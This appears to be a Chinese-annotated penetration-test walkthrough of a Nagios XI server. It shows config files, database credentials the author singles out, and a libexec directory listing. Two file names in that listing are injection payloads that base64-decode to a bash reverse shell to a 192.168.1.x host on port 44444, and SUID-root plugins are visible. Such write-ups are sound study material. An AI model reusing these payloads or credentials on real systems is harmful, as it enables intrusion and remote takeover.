refresh_rate=90
show_context_help=0
url_html_path=/nagios
use_authentication=1
use_pending_states=1
use_ssl_authentication=0$
$ cat commands.cfg
###############################################################################
#
# Commands configuration file
#
# Created by: Nagios CCM 3.0.8
# Date: 2021-01-22 18:07:41
# Version: Nagios Core 4.x
#
# --- DO NOT EDIT THIS FILE BY HAND ---
# Nagios CCM will overwrite all manual settings during the next update if you
# would like to edit files manually, place them in the 'static' directory or
# import your configs into the CCM by placing them in the 'import' directory.
#
###############################################################################
define command {
command_name check-host-alive
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w 3000.0,80% -c 5000.0,100% -p 5
}
define command {
command_name check-host-alive-http
command_line $USER1$/check_http -H $HOSTADDRESS$
}
define command {
command_name check-host-alive-tftp
command_line tftp $HOSTNAME$ 69
}
define command {
command_name check_bpi
command_line /usr/bin/php $USER1$/check_bpi.php $ARG1$
}
define command {
command_name check_capacity_planning
command_line $USER1$/check_capacity_planning.py $ARG1$ $ARG2$
}
define command {
command_name check_dhcp
command_line $USER1$/check_dhcp $ARG1$
}
define command {
command_name check_dir
command_line $USER1$/check_dir -d $ARG1$ -w $ARG2$ -c $ARG3$ $ARG4$
}
define command {
command_name check_dns
command_line $USER1$/check_dns -H $HOSTNAME$ $ARG1$
}
define command {
command_name check_docker
command_line $USER1$/check_docker.py $ARG1$
}
define command {
command_name check_dummy
command_line $USER1$/check_dummy $ARG1$ $ARG2$
}
define command {
command_name check_ec2
command_line $USER1$/check_ec2.py $ARG1$
}
define command {
command_name check_em01_humidity
command_line $USER1$/check_em01.pl --type=hum --hum=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em01_light
command_line $USER1$/check_em01.pl --type=illum --illum=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em01_temp
command_line $USER1$/check_em01.pl --type=temp --temp=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em08_contacts
command_line $USER1$/check_em08 $HOSTADDRESS$ C
}
define command {
command_name check_em08_humidity
command_line $USER1$/check_em08 $HOSTADDRESS$ H $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_light
command_line $USER1$/check_em08 $HOSTADDRESS$ I $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_rtd
command_line $USER1$/check_em08 $HOSTADDRESS$ R $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_temp
command_line $USER1$/check_em08 $HOSTADDRESS$ T $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_voltage
command_line $USER1$/check_em08 $HOSTADDRESS$ V $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_email_delivery
command_line $USER1$/check_email_delivery $ARG1$
}
define command {
command_name check_exchange_rbl
command_line $USER1$/check_bl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_file_service
command_line $USER1$/folder_watch.pl $ARG1$ $ARG2$ -f
}
define command {
command_name check_file_size_age
command_line $USER1$/folder_watch.pl $ARG1$ $ARG2$ -f
}
define command {
command_name check_ftp
command_line $USER1$/check_ftp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_ftp_fully
command_line $USER1$/check_ftp_fully "$ARG1$" "$ARG2$" "$ARG3$" $HOSTNAME$
}
define command {
command_name check_hpjd
command_line $USER1$/check_hpjd -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_http
command_line $USER1$/check_http -I $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_icmp
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$
}
define command {
command_name check_imap
command_line $USER1$/check_imap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_json
command_line php $USER1$/check_json.php $ARG1$
}
define command {
command_name check_local_disk
command_line $USER1$/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
}
define command {
command_name check_local_load
command_line $USER1$/check_load -w $ARG1$ -c $ARG2$
}
define command {
command_name check_local_mem
command_line $USER1$/custom_check_mem -w $ARG1$ -c $ARG2$ -n
}
define command {
command_name check_local_mrtgtraf
command_line $USER1$/check_mrtgtraf -F $ARG1$ -a $ARG2$ -w $ARG3$ -c $ARG4$ -e $ARG5$
}
define command {
command_name check_local_procs
command_line $USER1$/check_procs -w $ARG1$ -c $ARG2$ -s $ARG3$
}
define command {
command_name check_local_swap
command_line $USER1$/check_swap -w $ARG1$ -c $ARG2$
}
define command {
command_name check_local_users
command_line $USER1$/check_users -w $ARG1$ -c $ARG2$
}
define command {
command_name check_mailserver_rbl
command_line $USER1$/check_bl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_mongodb_database
command_line $USER1$/check_mongodb.py -H $HOSTADDRESS$ -A $ARG1$ -P $ARG2$ -W $ARG3$ -C $ARG4$ -u $ARG5$ -p $ARG6$ -d $ARG7$ -D
}
define command {
command_name check_mongodb_server
command_line $USER1$/check_mongodb.py -H $HOSTADDRESS$ -A $ARG1$ -P $ARG2$ -W $ARG3$ -C $ARG4$ -u $ARG5$ -p $ARG6$ -D --all-databases
}
define command {
command_name check_mountpoint
command_line $USER1$/check_mountpoints.sh $ARG1$
}
define command {
command_name check_nagiosxi_performance
command_line /usr/bin/php $USER1$/check_nagios_performance.php $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_nagios_performance
command_line $USER1$/check_nagios_performance -o $ARG1$ $ARG2$
}
define command {
command_name check_none
command_line /bin/true
}
define command {
command_name check_nrpe
command_line $USER1$/check_nrpe -H $HOSTADDRESS$ -t 30 -c $ARG1$ $ARG2$
}
define command {
command_name check_nrpeversion
command_line $USER1$/check_nrpe -H $HOSTADDRESS$
}
define command {
command_name check_nt
command_line $USER1$/check_nt -H $HOSTADDRESS$ -p $USER7$ -s $USER8$ -v $ARG1$ $ARG2$
}
define command {
command_name check_php_snmp_bandwidth
command_line $USER1$/get_snmp.php -H=$HOSTADDRESS$ -C=$ARG1$ -2 -I=$ARG2$ -u -w=$ARG3$ -c=$ARG4$ -d=$ARG5$
}
define command {
command_name check_ping
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$ -p 5
}
define command {
command_name check_pop
command_line $USER1$/check_pop -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_proc_usage
command_line $USER1$/check_proc_usage -p $ARG1$ $ARG2$
}
define command {
command_name check_radius_server_py
command_line $USER1$/check_radius.py -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_s3
command_line $USER1$/check_s3.py $ARG1$
}
define command {
command_name check_smtp
command_line $USER1$/check_smtp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_snmp
command_line $USER1$/check_snmp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_snmp_int
command_line $USER1$/check_snmp_int.pl -H $HOSTADDRESS$ -C $ARG1$ -2 -n $ARG2$ -f -k -w $ARG3$ -c $ARG4$ $ARG5$
}
define command {
command_name check_ssh
command_line $USER1$/check_ssh $ARG1$ $HOSTADDRESS$
}
define command {
command_name check_tcp
command_line $USER1$/check_tcp -H $HOSTADDRESS$ -p $ARG1$ $ARG2$
}
define command {
command_name check_tftp_connect
command_line $USER1$/check_tftp.sh --connect $ARG1$
}
define command {
command_name check_tftp_get
command_line $USER1$/check_tftp.sh --get $ARG1$ '$ARG2$' $ARG3$
}
define command {
command_name check_udp
command_line $USER1$/check_udp -H $HOSTADDRESS$ -p $ARG1$ $ARG2$
}
define command {
command_name check_vmware_api_guest
command_line $USER1$/check_vmware_api.pl -H "$HOSTADDRESS$" -f "$ARG1$" -N "$ARG2$" -l "$ARG3$" $ARG4$
}
define command {
command_name check_vmware_api_host
command_line $USER1$/check_vmware_api.pl -H "$HOSTADDRESS$" -f "$ARG1$" -l "$ARG2$" $ARG3$
}
define command {
command_name check_xi_by_ssh
command_line $USER1$/check_by_ssh -H $HOSTADDRESS$ $ARG1$ $ARG2$
}
define command {
command_name check_xi_deface
command_line $USER1$/check_http -H $HOSTADDRESS$ -r '$ARG1$' -u '$ARG2$' $ARG3$
}
define command {
command_name check_xi_domain_v2
command_line $USER1$/check_domain.php -d $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_xi_host_http
command_line $USER1$/check_http -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_host_ping
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w $ARG1$,$ARG2$ -c $ARG3$,$ARG4$ -p 5
}
define command {
command_name check_xi_hyperv
command_line $USER1$/check_ncpa.py -H $HOSTADDRESS$ -t $_HOSTNCPA_TOKEN$ -P $_HOSTNCPA_PORT$ -M $ARG1$ -w $ARG2$ -c $ARG3$
}
define command {
command_name check_xi_java_as
command_line JAVA_ABS_PATH -Djava.class.path=$ARG2$:$USER1$/check_jvm.jar GenericASCheck $ARG1$
}
define command {
command_name check_xi_java_weblogic
command_line $USER1$/check_wlsagent.sh $ARG1$
}
define command {
command_name check_xi_mssql_database2
command_line $USER1$/check_mssql_server.php -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mssql_query
command_line $USER1$/check_mssql -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mssql_server2
command_line $USER1$/check_mssql_server.php -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mysql_health
command_line $USER1$/check_mysql_health $ARG1$
}
define command {
command_name check_xi_mysql_query
command_line $USER1$/check_mysql_health $ARG1$
}
define command {
command_name check_xi_nagiosxiserver
command_line /usr/bin/php $USER1$/check_nagiosxiserver.php $ARG1$
}
define command {
command_name check_xi_ncpa
command_line $USER1$/check_ncpa.py -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_nna
command_line $USER1$/check_nna.py -H $HOSTADDRESS$ -K $ARG1$ $ARG2$
}
define command {
command_name check_xi_oraclequery
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_oracleserverspace
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_oracletablespace
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_postgres
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_postgres_db
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_postgres_query
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_service_dns
command_line $USER1$/check_dns -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_dnsquery
command_line $USER1$/check_dns $ARG1$
}
define command {
command_name check_xi_service_ftp
command_line $USER1$/check_ftp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_hpjd
command_line $USER1$/check_hpjd -H $HOSTADDRESS$ -C $ARG1$
}
define command {
command_name check_xi_service_http
command_line $USER1$/check_http -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_http_cert
command_line $USER1$/check_http -H $HOSTADDRESS$ -C $ARG1$
}
define command {
command_name check_xi_service_http_content
command_line $USER1$/check_http -H $HOSTADDRESS$ --onredirect=follow -s "$ARG1$"
}
define command {
command_name check_xi_service_ifoperstatus
command_line $USER1$/check_ifoperstatus -H $HOSTADDRESS$ -C $ARG1$ -k $ARG2$ $ARG3$
}
define command {
command_name check_xi_service_ifoperstatusnag
command_line $USER1$/check_ifoperstatnag $ARG1$ $ARG2$ $HOSTADDRESS$
}
define command {
command_name check_xi_service_imap
command_line $USER1$/check_imap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_ldap
command_line $USER1$/check_ldap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_mrtgtraf
command_line $USER1$/check_rrdtraf -f /var/lib/mrtg/$ARG1$ -w $ARG2$ -c $ARG3$ -l $ARG4$
}
define command {
command_name check_xi_service_nagioslogserver
command_line $USER1$/check_nagioslogserver.php $ARG1$
}
define command {
command_name check_xi_service_none
command_line $USER1$/check_dummy 0 "Nothing to monitor"
}
define command {
command_name check_xi_service_nsclient
command_line $USER1$/check_nt -H $HOSTADDRESS$ -s "$ARG1$" -p 12489 -v $ARG2$ $ARG3$ $ARG4$
}
define command {
command_name check_xi_service_ping
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w $ARG1$,$ARG2$ -c $ARG3$,$ARG4$ -p 5
}
define command {
command_name check_xi_service_pop
command_line $USER1$/check_pop -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_smtp
command_line $USER1$/check_smtp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp
command_line $USER1$/check_snmp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_load
command_line $USER1$/check_snmp_load_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_process
command_line $USER1$/check_snmp_process_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_storage
command_line $USER1$/check_snmp_storage_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_watchguard
command_line $USER1$/check_snmp_generic.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_load
command_line $USER1$/check_snmp_load.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_process
command_line $USER1$/check_snmp_process.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_service
command_line $USER1$/check_snmp_win.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_storage
command_line $USER1$/check_snmp_storage.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_ssh
command_line $USER1$/check_ssh $ARG1$ $HOSTADDRESS$
}
define command {
command_name check_xi_service_status
command_line sudo /usr/local/nagiosxi/scripts/manage_services.sh status $ARG1$
}
define command {
command_name check_xi_service_tcp
command_line $USER1$/check_tcp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_udp
command_line $USER1$/check_udp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_webinject
command_line $USER1$/check_webinject.sh $ARG1$
}
define command {
command_name check_xi_service_wmiplus
command_line $USER1$/check_wmi_plus.pl -H $HOSTADDRESS$ -u $ARG1$ -p $ARG2$ -m $ARG3$ $ARG4$
}
define command {
command_name check_xi_service_wmiplus_authfile
command_line $USER1$/check_wmi_plus.pl -H $HOSTADDRESS$ -A $ARG1$ -m $ARG2$ $ARG3$
}
define command {
command_name check_xi_sla2
command_line $USER1$/check_xi_sla.php $ARG1$
}
define command {
command_name check_xml
command_line php $USER1$/check_xml.php $ARG1$
}
define command {
command_name notify-host-by-email
command_line /usr/bin/printf "%b" "***** Nagios Monitor XI Alert *****\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n" | /bin/mail -s "** $NOTIFICATIONTYPE$ Host Alert: $HOSTNAME$ is $HOSTSTATE$ **" $CONTACTEMAIL$
}
define command {
command_name notify-service-by-email
command_line /usr/bin/printf "%b" "***** Nagios Monitor XI Alert *****\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Info:\n\n$SERVICEOUTPUT$" | /bin/mail -s "** $NOTIFICATIONTYPE$ Service Alert: $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$ **" $CONTACTEMAIL$
}
define command {
command_name process-host-perfdata-file-bulk
command_line /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/xidpe/$TIMET$.perfdata.host
}
define command {
command_name process-host-perfdata-file-pnp-bulk
command_line /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/perfdata/host-perfdata.$TIMET$
}
define command {
command_name process-host-perfdata-pnp-normal
command_line /usr/bin/perl /usr/local/nagios/libexec/process_perfdata.pl -d HOSTPERFDATA
}
define command {
command_name process-service-perfdata-file-bulk
command_line /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/xidpe/$TIMET$.perfdata.service
}
define command {
command_name process-service-perfdata-file-pnp-bulk
command_line /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/perfdata/service-perfdata.$TIMET$
}
define command {
command_name process-service-perfdata-pnp-normal
command_line /usr/bin/perl /usr/local/nagios/libexec/process_perfdata.pl
}
define command {
command_name xi_host_event_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_event.php --handler-type=host --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --lasthoststate=$LASTHOSTSTATE$ --lasthoststateid=$LASTHOSTSTATEID$ --hoststatetype=$HOSTSTATETYPE$ --currentattempt=$HOSTATTEMPT$ --maxattempts=$MAXHOSTATTEMPTS$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --hostoutput="$HOSTOUTPUT$" --longhostoutput="$LONGHOSTOUTPUT$" --hostdowntime=$HOSTDOWNTIME$
}
define command {
command_name xi_host_notification_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_notification.php --notification-type=host --contact="$CONTACTNAME$" --contactemail="$CONTACTEMAIL$" --type=$NOTIFICATIONTYPE$ --escalated="$NOTIFICATIONISESCALATED$" --author="$NOTIFICATIONAUTHOR$" --comments="$NOTIFICATIONCOMMENT$" --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hostalias="$HOSTALIAS$" --hostdisplayname="$HOSTDISPLAYNAME$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --lasthoststate=$LASTHOSTSTATE$ --lasthoststateid=$LASTHOSTSTATEID$ --hoststatetype=$HOSTSTATETYPE$ --currentattempt=$HOSTATTEMPT$ --maxattempts=$MAXHOSTATTEMPTS$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --hostoutput="$HOSTOUTPUT$" --longhostoutput="$LONGHOSTOUTPUT$" --datetime="$LONGDATETIME$"
}
define command {
command_name xi_service_event_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_event.php --handler-type=service --host="$HOSTNAME$" --service="$SERVICEDESC$" --hostaddress="$HOSTADDRESS$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --servicestate=$SERVICESTATE$ --servicestateid=$SERVICESTATEID$ --lastservicestate=$LASTSERVICESTATE$ --lastservicestateid=$LASTSERVICESTATEID$ --servicestatetype=$SERVICESTATETYPE$ --currentattempt=$SERVICEATTEMPT$ --maxattempts=$MAXSERVICEATTEMPTS$ --serviceeventid=$SERVICEEVENTID$ --serviceproblemid=$SERVICEPROBLEMID$ --serviceoutput="$SERVICEOUTPUT$" --longserviceoutput="$LONGSERVICEOUTPUT$" --servicedowntime=$SERVICEDOWNTIME$
}
define command {
command_name xi_service_notification_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_notification.php --notification-type=service --contact="$CONTACTNAME$" --contactemail="$CONTACTEMAIL$" --type=$NOTIFICATIONTYPE$ --escalated="$NOTIFICATIONISESCALATED$" --author="$NOTIFICATIONAUTHOR$" --comments="$NOTIFICATIONCOMMENT$" --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hostalias="$HOSTALIAS$" --hostdisplayname="$HOSTDISPLAYNAME$" --service="$SERVICEDESC$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --servicestate=$SERVICESTATE$ --servicestateid=$SERVICESTATEID$ --lastservicestate=$LASTSERVICESTATE$ --lastservicestateid=$LASTSERVICESTATEID$ --servicestatetype=$SERVICESTATETYPE$ --currentattempt=$SERVICEATTEMPT$ --maxattempts=$MAXSERVICEATTEMPTS$ --serviceeventid=$SERVICEEVENTID$ --serviceproblemid=$SERVICEPROBLEMID$ --serviceoutput="$SERVICEOUTPUT$" --longserviceoutput="$LONGSERVICEOUTPUT$" --datetime="$LONGDATETIME$"
}
###############################################################################
#
# Commands configuration file
#
# END OF FILE
#
###############################################################################
这里边可以看到,定义了很多命令,去监控系统的一些参数
$ cat ndo.cfg
# Default NDO config for Nagios XI
db_user=ndoutils
db_pass=n@gweb
db_name=nagios
db_host=localhost
db_port=3306
#db_socket=/var/lib/mysql.sock
db_max_reconnect_attempts=5
acknowledgement_data=1
comment_data=1
contact_status_data=1
downtime_data=1
event_handler_data=1
external_command_data=1
flapping_data=1
host_check_data=1
host_status_data=1
log_data=1
main_config_data=1
notification_data=1
object_config_data=1
process_data=1
program_status_data=1
retention_data=1
service_check_data=1
service_status_data=1
state_change_data=1
system_command_data=1
timed_event_data=1
config_output_options=2
max_object_insert_count=250
mysql_set_charset_name=utf8$
这里发现数据库的信息
db_user=ndoutils
db_pass=n@gweb
db_name=nagios
db_host=localhost
db_port=3306
继续查看
$ cd libexec
$ ls -al
total 11628
drwxrwsr-x 2 www-data nagios 4096 Jan 22 2021 .
drwxr-xr-x 8 root root 4096 Jan 22 2021 ..
-rwxr-xr-x 1 www-data nagios 8 Jan 22 2021 ;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
-rwxr-xr-x 1 www-data nagios 8 Jan 22 2021 ;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
-rwxrwxr-x 1 www-data nagios 210648 Jan 22 2021 check_apt
-rwxrwxr-x 1 www-data nagios 6897 Jan 22 2021 check_asterisk.pl
-rwxrwxr-x 1 www-data nagios 1978 Jan 22 2021 check_asterisk_sip_peers.sh
-rwxrwxr-x 1 www-data nagios 4173 Jan 22 2021 check_bl
-rwxrwxr-x 1 www-data nagios 2287 Jan 22 2021 check_bpi.php
-rwxrwxr-x 1 www-data nagios 2346 Jan 22 2021 check_breeze
-rwxrwxr-x 1 www-data nagios 220184 Jan 22 2021 check_by_ssh
-rwxrwxr-x 1 www-data nagios 15198 Jan 22 2021 check_capacity_planning.py
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_clamd -> check_tcp
-rwxrwxr-x 1 www-data nagios 157360 Jan 22 2021 check_cluster
-rwxrwxr-x 1 www-data nagios 5582 Jan 22 2021 check_cpu_stats.sh
-rwsrwxr-x 1 root nagios 212960 Jan 22 2021 check_dhcp
-rwxrwxr-x 1 www-data nagios 211744 Jan 22 2021 check_dig
-rwxrwxr-x 1 www-data nagios 3863 Jan 22 2021 check_dir
-rwxrwxr-x 1 www-data nagios 371688 Jan 22 2021 check_disk
-rwxrwxr-x 1 www-data nagios 10134 Jan 22 2021 check_disk_smb
-rwxrwxr-x 1 www-data nagios 235064 Jan 22 2021 check_dns
-rwxrwxr-x 1 www-data nagios 39709 Jan 22 2021 check_docker.py
-rwxrwxr-x 1 www-data nagios 8880 Jan 22 2021 check_domain.php
-rwxrwxr-x 1 www-data nagios 112184 Jan 22 2021 check_dummy
-rwxrwxr-x 1 www-data nagios 24836 Jan 22 2021 check_ec2.py
-rwxrwxr-x 1 www-data nagios 5576 Jan 22 2021 check_em01.pl
-rwxrwxr-x 1 www-data nagios 27096 Jan 22 2021 check_em08
-rwxrwxr-x 1 www-data nagios 38345 Jan 22 2021 check_email_delivery
-rwxrwxr-x 1 www-data nagios 20511 Jan 22 2021 check_email_delivery_epn
-rwxrwxr-x 1 www-data nagios 20039 Jan 22 2021 check_email_loop.pl
-rwxrwxr-x 1 www-data nagios 169539 Jan 22 2021 check_esx3.pl
-rwxrwxr-x 1 www-data nagios 5066 Jan 22 2021 check_file_age
-rwxrwxr-x 1 www-data nagios 6504 Jan 22 2021 check_flexlm
-rwxrwxr-x 1 www-data nagios 212688 Jan 22 2021 check_fping
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_ftp -> check_tcp
-rwxrwxr-x 1 www-data nagios 3446 Jan 22 2021 check_ftp_fully
-rwxrwxr-x 1 www-data nagios 213600 Jan 22 2021 check_hpjd
-rwxrwxr-x 1 www-data nagios 350128 Jan 22 2021 check_http
-rwsrwxr-x 1 root nagios 252312 Jan 22 2021 check_icmp
-rwxrwxr-x 1 www-data nagios 165632 Jan 22 2021 check_ide_smart
-rwxrwxr-x 1 www-data nagios 1796 Jan 22 2021 check_ifoperstatnag
-rwxrwxr-x 1 www-data nagios 15275 Jan 22 2021 check_ifoperstatus
-rwxrwxr-x 1 www-data nagios 13422 Jan 22 2021 check_ifstatus
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_imap -> check_tcp
-rwxrwxr-x 1 www-data nagios 35413 Jan 22 2021 check_imap_receive
-rwxrwxr-x 1 www-data nagios 15576 Jan 22 2021 check_imap_receive_epn
-rwxrwxr-x 1 www-data nagios 974 Jan 22 2021 check_init_service
-rwxrwxr-x 1 www-data nagios 6985 Jan 22 2021 check_ircd
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_jabber -> check_tcp
-rwxrwxr-x 1 www-data nagios 7615 Jan 22 2021 check_json.php
-rwxrwxr-x 1 www-data nagios 50451 Jan 22 2021 check_jvm.jar
-rwxrwxr-x 1 www-data nagios 223136 Jan 22 2021 check_ldap
lrwxrwxrwx 1 www-data nagios 10 Jan 22 2021 check_ldaps -> check_ldap
-rwxrwxr-x 1 www-data nagios 200248 Jan 22 2021 check_load
-rwxrwxr-x 1 www-data nagios 7068 Jan 22 2021 check_log
-rwxrwxr-x 1 www-data nagios 25575 Jan 22 2021 check_mailq
-rwxrwxr-x 1 www-data nagios 66592 Jan 22 2021 check_mongodb.py
-rwxrwxr-x 1 www-data nagios 11876 Jan 22 2021 check_mountpoints.sh
-rwxrwxr-x 1 www-data nagios 161568 Jan 22 2021 check_mrtg
-rwxrwxr-x 1 www-data nagios 168648 Jan 22 2021 check_mrtgtraf
-rwxrwxr-x 1 www-data nagios 25711 Jan 22 2021 check_mssql
-rwxrwxr-x 1 www-data nagios 132661 Jan 22 2021 check_mssql_server.php
-rwxrwxr-x 1 www-data nagios 222256 Jan 22 2021 check_mysql
-rwxrwxr-x 1 www-data nagios 122024 Jan 22 2021 check_mysql_health
-rwxrwxr-x 1 www-data nagios 206560 Jan 22 2021 check_mysql_query
-rwxrwxr-x 1 www-data nagios 182936 Jan 22 2021 check_nagios
-rwxrwxr-x 1 www-data nagios 7381 Jan 22 2021 check_nagios_performance.php
-rwxrwxr-x 1 www-data nagios 14560 Jan 22 2021 check_nagioslogserver.php
-rwxrwxr-x 1 www-data nagios 20732 Jan 22 2021 check_nagiosxiserver.php
-rwxrwxr-x 1 www-data nagios 11845 Jan 22 2021 check_ncpa.py
-rwxrwxr-x 1 www-data nagios 25602 Jan 22 2021 check_netstat.pl
-rwxrwxr-x 1 www-data nagios 10846 Jan 22 2021 check_nna.py
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_nntp -> check_tcp
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_nntps -> check_tcp
-rwxrwxr-x 1 www-data nagios 136424 Jan 22 2021 check_nrpe
-rwxrwxr-x 1 www-data nagios 218184 Jan 22 2021 check_nt
-rwxrwxr-x 1 www-data nagios 225936 Jan 22 2021 check_ntp
-rwxrwxr-x 1 www-data nagios 209976 Jan 22 2021 check_ntp_peer
-rwxrwxr-x 1 www-data nagios 208632 Jan 22 2021 check_ntp_time
-rwxrwxr-x 1 www-data nagios 240112 Jan 22 2021 check_nwstat
-rwxrwxr-x 1 www-data nagios 3259 Jan 22 2021 check_open_files.pl
-rwxrwxr-x 1 www-data nagios 9468 Jan 22 2021 check_oracle
-rwxrwxr-x 1 www-data nagios 186944 Jan 22 2021 check_overcr
-rwxrwxr-x 1 www-data nagios 204792 Jan 22 2021 check_pgsql
-rwxrwxr-x 1 www-data nagios 227056 Jan 22 2021 check_ping
-rwxrwxr-x 1 www-data nagios 6183 Jan 22 2021 check_pnp_rrds.pl
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_pop -> check_tcp
-rwxrwxr-x 1 www-data nagios 388326 Jan 22 2021 check_postgres.pl
-rwxrwxr-x 1 www-data nagios 228984 Jan 22 2021 check_procs
-rwxrwxr-x 1 www-data nagios 23219 Jan 22 2021 check_radius.py
-rwxrwxr-x 1 www-data nagios 183488 Jan 22 2021 check_real
-rwxrwxr-x 1 www-data nagios 9679 Jan 22 2021 check_rpc
-rwxrwxr-x 1 www-data nagios 9829 Jan 22 2021 check_rrdtraf
-rwxrwxr-x 1 www-data nagios 5299 Jan 22 2021 check_rrdtraf.php
-rwxrwxr-x 1 www-data nagios 24826 Jan 22 2021 check_s3.py
-rwxrwxr-x 1 www-data nagios 1630 Jan 22 2021 check_sensors
-rwxrwxr-x 1 www-data nagios 2174 Jan 22 2021 check_services
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_simap -> check_tcp
-rwxrwxr-x 1 www-data nagios 7599 Jan 22 2021 check_sip
-rwxrwxr-x 1 www-data nagios 254512 Jan 22 2021 check_smtp
-rwxrwxr-x 1 www-data nagios 20226 Jan 22 2021 check_smtp_send
